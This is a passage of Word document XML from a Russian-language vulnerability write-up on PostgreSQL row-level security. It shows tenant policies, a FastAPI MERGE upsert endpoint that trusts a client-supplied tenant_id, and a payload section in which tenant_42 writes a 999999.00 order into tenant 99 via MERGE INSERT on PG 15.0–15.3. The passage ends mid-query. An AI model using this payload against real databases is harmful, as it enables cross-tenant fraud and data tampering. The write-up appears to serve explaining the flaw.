          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162B290" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- INSERT policy: можно вставлять только в свой tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32691442" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY orders_insert ON app.orders FOR INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043AE892" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH CHECK (tenant_id = current_setting('jwt.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8CC2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDE1D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- UPDATE policy: можно обновлять только свои rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788CF859" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CREATE POLICY orders_update ON app.orders FOR UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53205E0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC4EBF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH CHECK (tenant_id = current_setting('jwt.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D5B5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6E98E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- SELECT policy: видны только свои rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAE6A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE POLICY orders_select ON app.orders FOR SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6F1DBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD48E50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6464CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Роль tenant_42 — обычный multi-tenant access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C398E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT INSERT, UPDATE, SELECT ON app.orders TO tenant_42;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B8ED0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Application использует MERGE для upsert-операций:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056AFE4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA2C4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/orders/upsert")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F729ADB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def upsert_order(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB9A67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: OrderPayload,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F28E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_tenant_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE0E455" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4767B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # MERGE для idempotent upsert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69623236" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D202C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        MERGE INTO app.orders AS t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19384108" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        USING (VALUES (:id, :tenant_id, :status, :amount))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E238BED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              AS s(id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BBC988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ON t.id = s.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F365B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHEN MATCHED THEN UPDATE SET status = s.status, amount = s.amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054513A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHEN NOT MATCHED THEN INSERT (id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EE7C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            VALUES (s.id, s.tenant_id, s.status, s.amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE5A11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """), {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21320E6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "id": order.id, "tenant_id": order.tenant_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186033AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "status": order.status, "amount": order.amount,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB6A03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740EB9B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7D6BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting('jwt.tenant_id')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устанавливается из JWT-claim в session-middleware. RLS policies должны гарантировать, что tenant 42 не сможет ни читать, ни писать в orders с tenant_id != 42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5ACC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — write to other tenant через MERGE INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF16CD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сценарий</w:t>
      </w:r>
      <w:r>
        <w:t>: tenant_42 хочет создать order для tenant_99 (например, financial fraud или sabotage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E83557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /orders/upsert (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5312EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09595A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "id": 12345,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB589F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 99,            ← чужой tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AB262" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "completed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A116C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 999999.00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B4271" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD09EB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application middleware устанавливает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET jwt.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (current tenant from JWT). MERGE отправляется в PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>В PG 15.0–15.3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706514F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Сервер видит (с current_user = tenant_42, jwt.tenant_id = 42):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E21CB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MERGE INTO app.orders AS t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D73D845" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING (VALUES (12345, 99, 'completed', 999999.00))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C8F6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AS s(id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5749ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ON t.id = s.id</w:t>
      </w:r>
    </w:p>
